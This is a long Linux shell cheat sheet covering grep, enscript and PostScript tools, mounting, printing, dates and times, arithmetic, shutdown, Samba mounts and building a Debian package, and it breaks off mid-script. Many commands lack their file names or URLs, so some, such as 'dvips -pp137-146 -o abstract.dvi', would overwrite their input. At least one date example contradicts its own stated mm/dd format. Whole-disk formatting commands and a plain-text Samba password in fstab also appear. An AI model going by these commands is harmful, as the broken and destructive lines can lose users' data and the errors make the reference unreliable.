output all lines in the file 'book' that begin with the text `in the beginning', regardless of case

 grep -i '^in the beginning' book

output lines in the file 'sayings' ending with an exclamation point

 grep '!$' sayings

output all lines in '/usr/dict/words' that are exactly two characters wide

 grep '^..$' /usr/dict/words

output all lines in '/usr/dict/words' that are 17 characters wide

 grep '^.\{17\}$' /usr/dict/words

output all lines in '/usr/dict/words' that are 25 or more characters wide

 grep '^.\{25,\}$' /usr/dict/words
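Because '^..$' anchors both ends of the line, the width-matching patterns above are easy to check against a small hand-made list (the sample words are made up):

```shell
# count the lines that are exactly two characters wide
printf 'ab\nabc\na\nxy\n' | grep -c '^..$'   # prints '2' (matches 'ab' and 'xy')
```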

output all lines in 'playlist' containing either 'the sea' or 'cake'

 grep 'the sea\|cake' playlist

output all lines in '/usr/dict/words' that are not three characters wide

 grep -v '^...$' /usr/dict/words

output all lines in 'access_log' that do not contain the string 'http'

 grep -v http access_log

output lines in '/usr/dict/words' that only contain vowels, type:

 grep -i '^[aeiou]*$' /usr/dict/words

search across line breaks for the string 'at the same time as' in the file 'notes'

 cat notes | tr -d '\r\n:\>\|-' | fmt -u | grep 'at the same time as'

list lines from the file 'email-archive' that contain the word 'narrative' only when it is quoted

 grep '^>' email-archive | grep narrative

list lines of 'archive' containing the word 'narrative', but not quoted

 grep narrative archive | grep -v '^>'

show lines in '/usr/dict/words' containing any of the words in the file 'swear'

 grep -f swear /usr/dict/words

output lines in '/usr/dict/words' not containing any of the words in 'swear'

 grep -v -i -f swear /usr/dict/words

search through the compressed file 'README.gz' for the text 'Linux'

 zgrep Linux README.gz

search the contents of the URL for lines containing the text 'gonzo' or `hunter'

 lynx -dump | grep 'gonzo\|hunter'

search '/usr/dict/words' for lines matching `tsch' and output two lines of context before and after each line of output

 grep -C2 tsch /usr/dict/words

search '/usr/dict/words' for lines matching `tsch' and output six lines of context before and after each line of output

 grep -6 tsch /usr/dict/words

search '/usr/dict/words' for lines matching `tsch' and output two lines of context before each line of output

 grep -B2 tsch /usr/dict/words

search '/usr/dict/words' for lines matching `tsch' and output six lines of context after each line of output

 grep -A6 tsch /usr/dict/words

search '/usr/dict/words' for lines matching `tsch' and output ten lines of context before and three lines of context after each line of output

 grep -B10 -A3 tsch /usr/dict/words
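The context options are easiest to see on generated input; in this sketch 'seq' stands in for '/usr/dict/words':

```shell
# show the matching line plus two lines of trailing context
seq 10 | grep -A2 '^5$'   # prints 5, 6 and 7, one per line
```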

replace the string 'helpless' with the string `helpful' in all files in the current directory

 perl -pi -e "s/helpless/helpful/g;" *

search forward through the text you are perusing for the word 'cat' /cat

convert the text file 'saved-mail' to PostScript, with default formatting, and spool the output right to the printer

 enscript saved-mail

write the text file 'saved-mail' to a PostScript file, '', and then preview it in X

 enscript -p saved-mail

print the contents of the text file 'saved-mail' on a PostScript printer, with text set in the Helvetica font at 12 points

 enscript -B -f "Helvetica12" saved-mail

make a PostScript file called '' containing the contents of the text file 'saved-mail', with text set in the Helvetica font at 12 points

 enscript -B -f "Helvetica12" -p saved-mail

print the contents of the text file 'saved-mail' to a PostScript printer, with text set in 10-point Times Roman and header text set in 18-point Times Bold

 enscript -f "Times-Roman10" -F "Times-Bold18" saved-mail

make a PostScript file called '' containing the contents of the text file 'saved-mail', with text and headers both set in 16-point Palatino Roman

 enscript -f "Palatino-Roman16" -F "Palatino-Roman16" -p

print a sign in 72-point Helvetica Bold type to a PostScript printer

 enscript -B -f "Helvetica-Bold72"

print a sign in 63-point Helvetica Bold across the long side of the page

 enscript -B -r --word-wrap -f "Helvetica-Bold63"

pretty-print the HTML file 'index.html'

 enscript -Ehtml index.html

pretty-print an email message saved to the file 'important-mail', and output it with no headers to a file named ''

 enscript -B -Email -p important-mail

peruse a list of currently supported languages

 enscript --help-pretty-print | less

print the contents of the text file 'saved-mail' with fancy headers on a PostScript printer

 enscript -G saved-mail

make a PostScript file called '' containing the contents of the text file 'saved-mail', with fancy headers

 enscript -G -p saved-mail

print the contents of the text file 'saved-mail' with a custom header label containing the current page number

 enscript -b "Page $% of the saved email archive" saved-mail

determine whether the file 'gentle.tex' is a TeX or LaTeX file, type:

 grep '\\document' gentle.tex

print a copy of the PostScript version of the SGML-Tools guide to the default printer

 zcat /usr/doc/sgml-tools/ | lpr

check the SGML file 'myfile.sgml'

 sgmlcheck myfile.sgml

make a plain text file from 'myfile.sgml'

 sgml2txt myfile.sgml

make a PostScript file from 'myfile.sgml'

 sgml2latex myfile.sgml
 latex myfile.latex
 dvips -t letter -o myfile.dvi

list all the X fonts on the system

 xlsfonts

list all the X fonts on the system whose name contains the text 'rea'

 xlsfonts '*rea*'

list all the bold X fonts on the system

 xlsfonts '*bold*'

display the characters in a medium Courier X font

 xfd -fn '-*-courier-medium-r-normal--*-100-*-*-*-*-iso8859-1'

set the console font to the scrawl_w font

 consolechars -f scrawl_w

set the console font to the 8x8 size sc font

 consolechars -H 8 -f sc

list all of the characters in the current console font


output the text 'news alert' in the default figlet font

 figlet news alert

output the text of the file 'poster' in the figlet `bubble' font

 cat poster | figlet -f bubble
NOTE: The 'bubble' font is installed at `/usr/lib/figlet/bubble.flf'.

make a banner saying 'Happy Birthday Susan'

 banner 'Happy Birthday Susan'

preview the file '/usr/doc/gs/examples/'

 ghostview /usr/doc/gs/examples/
extract only the first page from the file 'abstract.dvi' and send the PostScript output to the printer

 dvips -pp1 abstract.dvi

By default, dvips will output to the printer; to save the PostScript to a file instead, use the '-o' option.

output as PostScript the pages 137 to 146 of the file 'abstract.dvi' to the file `'

 dvips -pp137-146 -o abstract.dvi

select the first ten pages, page 104, pages 23 through 28, and page 2 from the file '' and write it to the file ''

 psselect -p1-10,104,23-28,2

write the 2nd-to-last to the tenth pages from the PostScript file '' and output them to the file ''

 psselect -p_2-10

write all even pages in '' to a new file, ''

 psselect -e

select all of the odd pages in the file '' and write them to a new file, ''

 psselect -o
Use an underscore ('_') alone to insert a blank page, and use `-r' to output the selected pages in reverse order.

select the last ten pages of file '', followed by a blank page, followed by the first ten pages, and output them to a new file, ''

 psselect -p_1-_10,_,1-10

select the pages 59, 79, and 99 in the file '', and output them in reverse order (with the 99th page first) to a new file, ''

 psselect -p59,79,99 -r

make a new PostScript file, '', putting two pages from the file '' on each page

 psnup -2
To specify the paper size, give the name of a standard paper size as an argument to the '-p' option.

rearrange the pages of file '' into a signature and write it to the file ''

By default, psbook uses one signature for the entire file. If the file is large, use the '-s' option to set the number of pages per signature.

rearrange the pages of file '' into an eight-sided signature and write it to ''

 psbook -s8

resize the file '' to US letter-sized paper, saving to ''

 psresize -pletter

merge the files '', '', and '' into a postscript file, ''


make a booklet from the file '':


make a double-sized booklet on letter-sized paper in landscape orientation, from a file using letter-sized portrait orientation, type:

 psbook >

make a text file, 'sutra.txt', from the input file `', type:

 ps2ascii sutra.txt

see how much free space is left on the system's disks

 df

output the disk usage for the folder tree whose root is the current directory

 du

output the disk usage, in kilobytes, of the '/usr/local' directory tree

 du -k /usr/local

show the number of megabytes used by the file '/tmp/cache'

 du -m /tmp/cache

output only the total disk usage of the '/usr/local' directory tree

 du -s /usr/local

output only the total disk usage, in kilobytes, of the '/usr/local' folder tree

 du -s -k /usr/local

format a floppy disk in the first removable floppy drive

 mke2fs /dev/fd0

Mounting And Unmounting Media ‹↑›

In order for a piece of removable media (a floppy, CD-ROM or USB stick) to be used in Linux, it normally needs to be 'mounted' first, and 'unmounted' when you have finished with it.

mount a floppy

 mount /floppy

mount the floppy in the first floppy drive to '~/tmp'

 mount /dev/fd0 ~/tmp

Once you have mounted a floppy, its contents appear in the directory you specify, and you can use any file command on them.

list the contents of the base directory of the floppy mounted on '/floppy'

 ls /floppy

list the contents of the whole folder tree on the floppy mounted on '/floppy'

 ls -lR /floppy

umount the usb stick that is mounted on '/floppy'

 umount /floppy

You can't unmount a drive while your current working directory is inside the mounted folder.

mount a CD-ROM on the system

 mount /cdrom   the contents are then available at '/cdrom/'

mount the disc in the CD-ROM drive to the '/usr/local/share/clipart' directory

 mount /dev/cdrom /usr/local/share/clipart

peruse a directory tree graph of the CD-ROM's contents

 tree /usr/local/share/clipart | less

change to the root directory of the CD-ROM

 cd /usr/local/share/clipart

list the contents of the root directory of the CD-ROM

 ls /usr/local/share/clipart

unmount the disc in the CD-ROM drive mounted on '/cdrom'

 umount /cdrom   if files are in use, it may be impossible to unmount

Printing ‹↑›

print the file 'invoice'

 lpr invoice

type a message with banner and send it to the printer

 banner "Bon voyage!" | lpr

print a verbose, recursive listing of the '/usr/doc/HOWTO' directory

 ls -lR /usr/doc/HOWTO | lpr

send the file 'nightly-report' to the printer called bossomatic, type:

 lpr -P bossomatic nightly-report

print a dozen copies of the file 'nightly-report'

 lpr -#12 nightly-report

Printing Queues ‹↑›

view the spool queue for the default printer

 lpq

view the spool queue for the printer called bossomatic

 lpq -P bossomatic

list the print jobs for user harpo

 lpq harpo

Canceling Print Jobs ‹↑›

cancel print job 83

 lprm 83

cancel all of your print jobs, but already spooled pages still print

 lprm -

print the current buffer with page numbers and headers

  M-x print-buffer

print the current buffer with no additional print formatting done to the text

 M-x lpr-buffer

print a PostScript image of the current buffer

 M-x ps-print-buffer

print the DVI file 'list.dvi'

 dvips list.dvi

print 'home.dvi' on an envelope loaded in the manual feed tray of the printer

 dvips -m -t landscape home.dvi

list the available printer formats

 gs -?

GNU Ghostscript 5.10 (1998-12-17)

convert '' to a format suitable for printing on an HP Color DeskJet 500 printer

 gs -sDEVICE=cdj500 -dSAFER -dNOPAUSE < /dev/null

convert the file 'abstract.dvi' to PostScript

 dvips -o abstract.dvi

this command reads the dvi file 'abstract.dvi' and writes a postscript version of it to the file ''; the original file is not altered

output only pages 14 and 36 from file 'abstract.dvi' to a PostScript file, ''

 dvips -pp14,36 -o abstract.dvi

output pages 2 - 100 from 'abstract.dvi' to a postscript file, ''

 dvips -pp2-100 -o abstract.dvi

output page 1 and pages 5 to 20 from file 'abstract.dvi' to a PostScript file, ''

 dvips -pp1,5-20 -o abstract.dvi

output 'abstract.dvi' as a PostScript file, '', with a paper size of `legal'

 dvips -t legal -o abstract.dvi

print the file 'abstract.dvi' to the default printer in landscape mode

 dvips -t landscape abstract.dvi

generate a pdf file from the dvi file 'abstract.dvi'

 dvips -Ppdf -o abstract.ps abstract.dvi; ps2pdf abstract.ps

The dvips command writes PostScript tuned for PDF conversion; ps2pdf then converts it, writing a new file, 'abstract.pdf', in PDF format.

convert the PDF file 'pricelist.pdf' to PostScript

 pdf2ps pricelist.pdf

output the man page for psbook as PostScript and send it to the default printer

 man -t psbook | lpr

output the man page for psbook to the file ''

 man -t psbook >

In the preceding example, you can then use gs to convert the file to a format your non-PostScript printer understands.

get a directory listing of the DOS disk currently in the primary floppy drive

 mdir a:

introduce the floppy disk in the first floppy drive as an HFS volume to the 'hfsutils' tools

 hmount /dev/fd0
After you run this command, the other tools in the hfsutils package will operate on this disk.

get a directory listing of the currently specified Macintosh disk

 hls

Give the name of a directory as a quoted argument.

get a directory listing of the 'Desktop Folder' directory in the currently specified Macintosh disk

 hls 'Desktop Folder'

copy the file 'readme.txt' to the `Desktop Folder' directory in the current Mac disk

 hcopy readme.txt 'Desktop Folder'

copy the file 'Desktop Folder:Readme' from the current Mac disk to the current directory

 hcopy 'Desktop Folder:Readme' .

delete the file 'Desktop Folder:Readme' on the current Mac disk, type:

 hdel 'Desktop Folder:Readme'

format the disk in the first floppy drive with a Macintosh HFS filesystem

 hformat /dev/fd0

format the disk in the second floppy drive with a Mac HFS filesystem, giving it a volume label of 'Work Disk'

 hformat -l 'Work Disk' /dev/fd1

format the second partition of the SCSI disk at '/dev/sd2' with a Mac HFS filesystem

 hformat /dev/sd2 2

format the entire SCSI disk at '/dev/sd2' with a Mac HFS filesystem, overwriting any existing Mac filesystem and giving it a label of 'Joe's Work Disk'

 hformat -f -l "Joe's Work Disk" /dev/sd2 0  Dangerous!!

Times And Dates ‹↑›

Convert UNIX time to human readable date

 awk 'BEGIN{print strftime("%c",1238387636)}'

show a calendar in English

 LC_TIME=C cal -y

When was your OS installed?

 ls -lct /etc | tail -1 | awk '{print $6, $7}'

add the current time to your bash shell prompt

 export PS1="${PS1%\\\$*}"' \t \$ '

Binary Clock

 watch -n 1 'echo "obase=2;`date +%s`" | bc'

output the numeric day of the year that 21 June falls on in the current year

 date -d '21 Jun' +%j   may print '172' for example

hear the current system time

 saytime

remind yourself to leave at 8:05 p.m.

 leave 2005

ring the bell in five seconds

 sleep 5; echo -e '\a'

announce the time in exactly five minutes

 sleep 5m; saytime &

announce the time in thirty seconds

 sleep 30; saytime

Display The Current Time And Date ‹↑›

print today's time and date in the format '12:32am 23 July 2009'

 date "+%l:%M%p %d %B %Y"

display today's date in the format '03Mar2009'

 date "+%d%b%Y"

find out what format specifiers you can use with the 'date' command

 man strftime

get the current week number of the year

 date +%V

output the current date and time in RFC822 format

 date -R   prints 'Fri, 11 May 2001 11:10:29 -0400' for example

output the current system date and time in a standard format

 date

This prints something like 'Fri May 11 11:10:29 EST 2001' where 'EST' signifies the timezone (in this case 'Eastern Standard Time')

output the current date and time in UTC format

 date -u   prints 'Fri May 11 15:10:29 UTC 2001'

Display a cool clock on your terminal

 watch -t -n1 "date +%T|figlet"

Using Date Time Stamps ‹↑›

backup the file 'eg.txt' to 'eg.txt.13may2010' (using the current date)

 cp eg.txt{,.$(date "+%d%b%Y")}

backup the file 'eg.txt' with a readable format date-time stamped file

 cp eg.txt{,.$(date "+%d%b%Y.%I-%M%p")}

This will back up the file 'eg.txt' to 'eg.txt.13may2010.10-45am' for example where the filename used represents the current date and time.

a function to back up a file with a date-time stamp name

 bak(){ [ -z "$1" ] || cp $1{,.$(date "+%d%b%Y.%I-%M%p")}; }
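One caveat: the function above passes '$1' to cp unquoted, so filenames containing spaces break. A variant with quoting (the scratch file name is illustrative):

```shell
# quoted version of bak(): names with spaces survive
bak(){ [ -z "$1" ] || cp -- "$1" "$1.$(date "+%d%b%Y.%I-%M%p")"; }
echo test > '/tmp/my file.txt'
bak '/tmp/my file.txt'
ls '/tmp/my file.txt.'*    # shows the date-time stamped copy
```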

Setting The System Date And Time ‹↑›

There are a number of ways to set the date and time on the computer. One way is to set the time locally. Another is to use a network time server, which should be more accurate in the long run.

advance the clock by 3 minutes

 date -s '+3 mins'

set the hardware clock

 hwclock --systohc   set the hardware clock from the current system time

set the system date

 rdate -s

read about using a network time server to set the date

 man ntp

Converting Time And Date Formats ‹↑›

Dates and times come in many different text formats, depending on the country and the whim of the writer. This is a very thorny issue, but it often must be dealt with. The problem is confounded by cultural differences in ways of measuring time.

Unix-type operating systems such as Linux and Mac OS X have traditionally used the number of seconds since 1970 as a universal date-time format, but this has obvious limitations.

Unix time to local time

 date -R -d @1234567890

Converting Date And Time Timezones ‹↑›

If you need to know the equivalent date and time in a different timezone, then you will have to do a conversion.

Foreign And Non Local Times And Dates ‹↑›

show what time and date it is in new york

 TZ=America/New_York date

print the time and date in the 'Indian/Maldives' timezone

 TZ=Indian/Maldives date

show what time and date it is in bogota, colombia

 TZ=America/Bogota date

show what general time zones are available

 ls /usr/share/zoneinfo/ | less

show all available specific time-zones

 f=/usr/share/zoneinfo; find $f | sed "s,$f,," | less

a function which searches for a particular time-zone by name

 tiz(){ f=/usr/share/zoneinfo; find $f | sed "s,$f,," | grep -i "$1"; }; tiz perth

show all the specific time-zones for the Australian zone

 ls /usr/share/zoneinfo/Australia

get time in other timezones

 let utime=$offsetutc*3600+$(date --utc +%s)+3600; date --utc --date=@${utime}

show the date in the german language

 LC_TIME=de_DE.utf8 date

Timezones ‹↑›

show the time in various timezones


Greenwich Mean Time ‹↑›

print greenwich mean time in the format 'Fri Jul 17 16:36:24 2009'

 perl -e "print scalar(gmtime(1247848584))"

Date And Time Offsets ‹↑›

A date offset is something like '2 days ago' or 'tomorrow'.

retrieve GMT time from websites (generally accurate)

 w3m -dump_head | awk '/Date+/{print $6, $7}'

Get the time from NIST.GOV

 cat </dev/tcp/

print the date 14 days ago.

 date --date="1 fortnight ago"
 date -d "1 fortnight ago"     the same

print date 24 hours ago

 date --date=yesterday

Get yesterday's date or a previous time

 date -d '1 day ago'; date -d '11 hour ago'; date -d '2 hour ago - 3 minute'; date -d '16 hour'

Unix Time ‹↑›

Unix time is a number which represents the number of seconds since 1970-01-01 00:00:00 UTC.
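Two quick checks of that definition, pinned to UTC so the local timezone does not interfere:

```shell
date -u -d @0 "+%Y-%m-%d %H:%M:%S"    # prints '1970-01-01 00:00:00'
date -u -d '1970-01-02 00:00:00' +%s  # prints '86400', one day of seconds
```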

Easily decode unix-time (function)

 utime(){ perl -e "print localtime($1).\"\n\"";}

show the number of seconds since 1970

 date +%s

Unix alias for date command that lets you create timestamps

 alias timestamp='date "+%Y%m%dT%H%M%S"'

Convert To Unix Time ‹↑›

It can be useful to convert to unix-time when arithmetic needs to be performed on dates or times, or when dates need to be sorted. The 'date' command does a very good job of parsing diverse date strings (such as feb 7 2009 or 01/11/2001) with its '-d' option, but it has its limitations
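A typical use of such a conversion is date arithmetic; this sketch computes the number of days between two dates by subtracting their unix times ('-u' pins both to UTC, so daylight-saving shifts cannot skew the count):

```shell
# days between two dates, via seconds-since-1970
a=$(date -u -d "feb 7 2009" +%s)
b=$(date -u -d "feb 14 2009" +%s)
echo $(( (b - a) / 86400 ))   # prints '7'
```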

convert a date string to the number of seconds since 1970

 date -d "Sat Feb 7 00:37:06 EST 2009" +%s

convert tomorrow's date (midnight) into unix-time

 date -d'tomorrow' +%s  prints something like '1264168894'

print the last date representable by a signed 32-bit unix time

 date -ud @$[2**31-1]   prints 'Tue Jan 19 03:14:07 UTC 2038'

convert the date 'february 7, 2009' into unix-time

 date -d "Sat Feb 7 00:00:00 EST 2009" +%s
 date -d "feb 7 2009" +%s
 date -d "7 feb 2009" +%s       the same
 date -d "february 7 2009" +%s  the same
 date -d "7/2/2009" +%s         the same, expects mm/dd/yyyy
 date -d "7/2/09" +%s           the same

these formats do NOT work (GNU date, coreutils 7.4)

 date -d "feb/7/2009" +%s       NO!! doesn't work, at least for me
 date -d "7/feb/2009" +%s       nor does this work
 date -d "feb 2009" +%s         nor does this work

convert the date 'Dec 11 01:25:00 2008' to a unix time value

 perl -e 'use Time::Local; print timelocal(0,25,1,11,11,2008), "\n";'
should print '1228919100'

Convert From Unix Time ‹↑›

convert unix time (seconds since 1970) to something human readable

 date -d @1234567890

convert unix-time (seconds since 1970) to something more human-readable

 perl -e 'print scalar(gmtime(1234567890)), "\n"'

convert unix-time to human-readable with awk

 echo 1234567890 | awk '{ print strftime("%c", $0); }'

Calendars ‹↑›

output a calendar for the current month

 cal

output a calendar for the year 2001

 cal 2001

output a calendar for the current year

 cal -y

output a calendar for June 1991

 cal 06 1991

Printing multiple years with Unix cal command

 for y in $(seq 2009 2011); do cal $y; done

Show this month's calendar, with today's date highlighted

 cal | grep --before-context 6 --after-context 6 --color -e " $(date +%e)" -e "^$(date +%e)"

Show the date of easter

 ncal -e

Display holidays in UK/England for 2009 (with week numbers)

 gcal -K -q GB_EN 2009

Clocks ‹↑›

Display clock in terminal

 watch -n 1 :

StopWatch, simple text, hh:mm:ss using Unix Time

 export I=$(date +%s); watch -t -n 1 'T=$(date +%s);E=$(($T-$I));hours=$((E / 3600)) ; seconds=$((E % 3600)) ; minutes=$((seconds / 60)) ; seconds=$((seconds % 60)) ; echo $(printf "%02d:%02d:%02d" $hours $minutes $seconds)'

Arithmetic And Numbers ‹↑›


convert the hexadecimal number 0x64 to decimal

 printf "%d\n" 0x64   prints '100'

floating point operations in shell scripts

 echo "5 k 3 5 / p" | dc

formatting number with comma

 printf "%'d\n" 1234567

output the result of 50 times 10

 calc '50*10'  prints '500'

output the result of 100 times the sum of 4 plus 420

 calc '100*(4+420)'  prints '42400'

output the remainder of 10 divided by 3

 calc 10%3           prints '1'

use bc to compute the result of 10 divided by 3, using 20 digits after the decimal point

 echo 'scale=20; 10/3' | bc

Count to 65535 in binary (for no apparent reason)

 a=`printf "%*s" 16`;b=${a//?/{0..1\}}; echo `eval "echo $b"`

Bc The Binary Calculator ‹↑›

start the bc binary calculator in interactive mode

 bc

assign values to variables in bc and print the sum of 2 variables

 a=4; b=7; a+b  prints '11' on a new line

raise 4 to the power of 3 and multiply the result by 10

 4^3; .*10    you can use the '.' to access the last result

set the number of decimal places shown to 4 and compute 112 divided by 111

 scale=4; 112/111;  this prints '1.0090' on a new line

set the number of decimal places shown to 10

 scale=10
multiply the variable 'a' by 4

 a*4

Floating point power p of x

 bc -l <<< "x=2; p=0.5; e(l(x)*p)"

Random Numbers ‹↑›

see: jot

lotto generator

 shuf -i 1-49 | head -n6 | sort -n| xargs

Outputs a 10-digit random number

 echo $RANDOM$RANDOM$RANDOM |cut -c3-12

Outputs a 10-digit random number

 head -c10 <(echo $RANDOM$RANDOM$RANDOM)

Outputs a 10-digit random number

 head -c4 /dev/urandom | od -N4 -tu4 | sed -ne '1s/.* //p'

Display rows and columns of random numbers with awk

 seq 6 | awk '{for(x=1; x<=5; x++) {printf ("%f ", rand())}; printf ("\n")}'

Print a random 8 digit number

 jot -r -n 8 0 9 | rs -g 0

Print a random 8 digit number

 jot -s '' -r -n 8 0 9

Random number generation within a range N, here N=10

 echo $(( $RANDOM % 10 + 1 ))
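Since '$RANDOM % N' yields a value in 0..N-1, adding 1 gives 1..N; a loop can spot-check that the bounds hold (bash's $RANDOM variable is assumed):

```shell
# draw 200 numbers and verify they all fall within 1..10
ok=yes
for i in $(seq 200); do
  n=$(( RANDOM % 10 + 1 ))
  { [ "$n" -ge 1 ] && [ "$n" -le 10 ]; } || ok=no
done
echo $ok   # prints 'yes'
```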

output a random number from 0 to 9

 random 10

Outputs a 10-digit random number

 tr -c -d 0-9 < /dev/urandom | head -c 10

Printable random characters

 tr -dc '[:print:]' < /dev/urandom

a random number guessing game

 A=1;B=100;X=0;C=0;N=$[$RANDOM%$B+1];until [ $X -eq $N ];do read -p "N between $A and $B. Guess? " X;C=$(($C+1));A=$(($X<$N?$X:$A));B=$(($X>$N?$X:$B));done;echo "Took you $C tries, Einstein";

sort the lines of a file in a random way

 cat test.txt | while read f ; do printf "$RANDOM\t%s\n" "$f"; done | sort -n | cut -f2-

print a random number with printf

 printf "$RANDOM %s\n" number

Sequences ‹↑›

output the sequence of numbers from one to seven

 seq 7

output the sequence of numbers from one to negative seven

 seq 1 -1 -7

output the sequence of numbers from nine to zero

 seq 9 -1 0

output the sequence of numbers from negative one to negative twenty

 seq -1 -1 -20

output the sequence of numbers from -1 to 14, incrementing by 3,

 seq -1 3 14
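With GNU seq, descending output needs an explicit negative increment as the middle argument; a positive step whose start exceeds the end prints nothing:

```shell
seq 5 -1 1 | tr '\n' ' '   # prints '5 4 3 2 1 '
```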

output from 9 to 999, stepping by 23, with numbers padded with zeros

 seq -w 9 23 999   all numbers will have an equal 'width'

output the sequence of numbers from 1 to 23, with a space character between each

 seq -s ' ' 1 23

concatenate all the files in this folder, whose names are numbers 25 to 75, into a new file called 'selected-mail'

 cat $(seq -s " " 25 75) > selected-mail

output the prime factors of 2000

 factor 2000  prints '2000: 2 2 2 2 5 5 5'

output the number of ounces in 50 grams

 units '50 grams' 'ounces'
 * 1.7636981
 / 0.56699046

determine the location of the units database

 units -V
units version 1.55 with readline, units database in /usr/share/misc/units.dat

output the English text equivalent of 100,000

 number 100000

Mathematics ‹↑›

Find out how to say the first 66 digits of pi as a word

 pi 66 | number

Fibonacci numbers with awk

 awk 'BEGIN {a=1;b=1;for(i=0;i<'${NUM}';i++){print a;c=a+b;a=b;b=c}}'

Fibonacci numbers with sh

 prev=0;next=1;echo $prev;while(true);do echo $next;sum=$(($prev+$next));prev=$next;next=$sum;sleep 1;done

A handy mathematical calculator


Draw a Sierpinski triangle

 perl -e 'print "P1\n256 256\n", map {$_&($_>>8)?1:0} (0..0xffff)' | display

Weather ‹↑›

get Hong Kong weather information from HK Observatory

 wget -q -O - '' | sed -r 's/<[^>]+>//g;/^UV/q' | grep -v '^$'

check the weather

 ZIP=48104; curl$ZIP 2>/dev/null|grep -A1 'div class="large"'|tr '\n' ' '|sed 's/^.*"large" >\(..\)/\1/;s/&d.* <br \/>/ - /;s/<br \/>//;s/<\/div.*$//'

Show current weather for any US city or zipcode

 weather() { lynx -dump "$*" | sed 's/^ *//;/ror has occ/q;2h;/__/!{x;s/\n.*//;x;H;d};x;s/\n/ -- /;q';}

Money ‹↑›

list the files under 'yms_web' changed in svn by user 'george' since 21 May 2009

 svn log -v -r{2009-05-21}:HEAD | awk '/^r[0-9]+ / {user=$3} /yms_web/ {if (user=="george") {print $2}}' | sort | uniq

Science ‹↑›

Mirror the NASA Astronomy Picture of the Day Archive

 wget -t inf -k -r -l 3 -p -m

View the latest astronomy picture of the day from NASA.

 apod(){ local x=;feh $x$(curl -s ${x}astropix.html|grep -Pom1 'image/\d+/.*\.\w+');}

Real time satellite weather wallpaper

 curl | xli -onroot -fill stdin

Geography ‹↑›

find geographical location of an ip address

 lynx -dump$1|grep address|egrep 'city|state|country'|awk '{print $3,$4,$5,$6,$7,$8}'|sed 's\ip address flag \\'|sed 's\My\\'

find geographical location of an ip address

 lynx -dump$1|sed -nr s/'^.*My IP address city: (.+)$/\1/p'

geoip lookup, the geographical location of an ip address

 geoip(){ curl -s "${1}" | sed '/^IP:/!d;s/<[^>][^>]*>//g' ;}

Gps Global Positioning System ‹↑›

send a .loc file to a garmin gps over usb

 gpsbabel -D 0 -i geo -f "/path/to/.loc" -o garmin -F usb:

Shutting Down The Computer ‹↑›

immediately shut down and halt the system

 shutdown -h now

immediately shutdown the system, and then reboot

 shutdown -r now

immediately shut down and halt the system, sending a warning to all users

 shutdown -h now "The system is being shut down now!"

shut down and then reboot the system at 4:23 a.m.

 shutdown -r 4:23

shut down and halt the system at 8:00 p.m.

 shutdown -h 20:00

shut down and halt the system in five minutes

 shutdown -h +5

shut down and halt the system at midnight, and warn all logged-in users

 shutdown -h 00:00 "The system is going down for maintenance at midnight"

cancel any pending shutdown

 shutdown -c

cancel any pending shutdown and send a message to all logged in users

 shutdown -c "Sorry, I hit the wrong key!"

find out where perl is installed on your system

 which perl

create a new user with a username of bucky

 adduser bucky   by default, the new user's home directory will be '/home/bucky'

add the user doug to the audio group

 addgroup doug audio

find out how long the system has been up

 uptime

prints 3:34pm up 4:31, 4 users, load average: 0.01, 0.05, 0.07

output a list of times when the system was rebooted

 last reboot

output the name of the operating system

 uname

output the release number of the operating system

 uname -r

output the CPU processor type of the system

 uname -m

output all of the uname information for the system you are on,

 uname -a

output the release name of the Debian system you are on

 cat /etc/debian_version

Debian releases have historically been named after characters from the motion picture Toy Story.

Microsoft Windows ‹↑›

Change Windows Domain password from Linux

 smbpasswd -r <domain-server> -U <user name>

Use Cygwin to talk to the Windows clipboard

 cat /dev/clipboard; somecommand > /dev/clipboard

Mount a Windows shared folder on the local network (Ubuntu) with user

 sudo mount -t cifs -o user,username="samba username"

automount samba shares as devices in /mnt/

 sudo vi /etc/fstab; Go//smb-share/gino /mnt/place smbfs defaults,username=gino,password=pass 0 0<esc>:wq; mount //smb-share/gino

mount a windows partition

    sudo mkdir /media/nt/
    sudo fdisk -l   # find out where is the nt partition
    sudo mount -t ntfs -o nls=utf8,umask=0222 /dev/hdb1 /media/nt



 The following is a procedure for creating a Debian package.

  * create a 'debian/usr/bin' folder and copy the executable there
  >> mkdir -p ./debian/usr/bin; cp someprogram ./debian/usr/bin
  * create a man page for the program
  >> vim someprogram.1
   ##(this is an optional step)
  * create a man page folder and copy the man page there,
  >> mkdir -p ./debian/usr/share/man/man1
  >> cp ./man/man1/someprogram.1 ./debian/usr/share/man/man1

  * compress the man page with gzip (an optional step)
  >> gzip -9 ./debian/usr/share/man/man1/someprogram.1

  * create a copyright file to include in the package
  >> find /usr/share/doc -name "copyright" ##(see examples of copyright files)

  * create a folder for the copyright file and copy the file there
  >> mkdir -p ./debian/usr/share/doc/someprogram
  >> cp ./copyright ./debian/usr/share/doc/someprogram

  * find out the dependencies of all programs which your program uses
  >> dpkg -S /bin/cat ##(this will display 'coreutils: /bin/cat')
  * find out the version numbers of dependencies
  >> apt-cache showpkg coreutils
   ##(this information is needed for the 'Dependencies' field of the control file)

   make a control file..

     Package: someprogram 
     Version: 1.1-1
     Section: base
     Priority: optional
     Architecture: all
     Depends: bash (>= 2.05a-11), textutils (>= 2.0-12), awk, procps (>= 1:2.0.7-8), sed (>= 3.02-8), grep (>= 2.4.2-3), coreutils (>= 5.0-5)
     Maintainer: James Tree <>
     Description: parses a text stream 
      This script parses a text stream using a stack virtual machine 

copy the control file to the 'DEBIAN' folder

 mkdir -p debian/DEBIAN; cp control debian/DEBIAN
on some Debian systems you may also need: find ./debian -type d | xargs chmod 755

make a change log file (an optional step)

     someprogram (1.1-1) unstable; urgency=low
  * Made Debian package lintian clean.
      -- James Tree <>  2002-12-13

make a changelog.Debian file (optional)

   someprogram Debian maintainer and upstream author are identical.
   Therefore see also the normal changelog file for Debian changes.

create and rename the package file

 dpkg-deb --build debian; mv debian.deb someprogram_1.1-1_all.deb
or build it with fakeroot (so the packaged files appear root-owned): 'fakeroot dpkg-deb --build debian'

install the newly created package

 dpkg -i ./someprogram_1.1-1_all.deb

remove the installed package

 dpkg -r someprogram
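
The steps above can be collected into one build script; a sketch which assumes the executable 'someprogram' and a 'control' file live in the current directory (stand-ins are generated here so the sketch is self-contained, and dpkg-deb is only invoked if it is installed):

```shell
#!/bin/sh
# build a minimal binary .deb from a single executable
set -e

PKG=someprogram
VER=1.1-1

# stand-in executable and control file; in real use these already exist
[ -f "$PKG" ] || printf '#!/bin/sh\necho hello\n' > "$PKG"
[ -f control ] || cat > control <<EOF
Package: $PKG
Version: $VER
Section: base
Priority: optional
Architecture: all
Maintainer: James Tree <>
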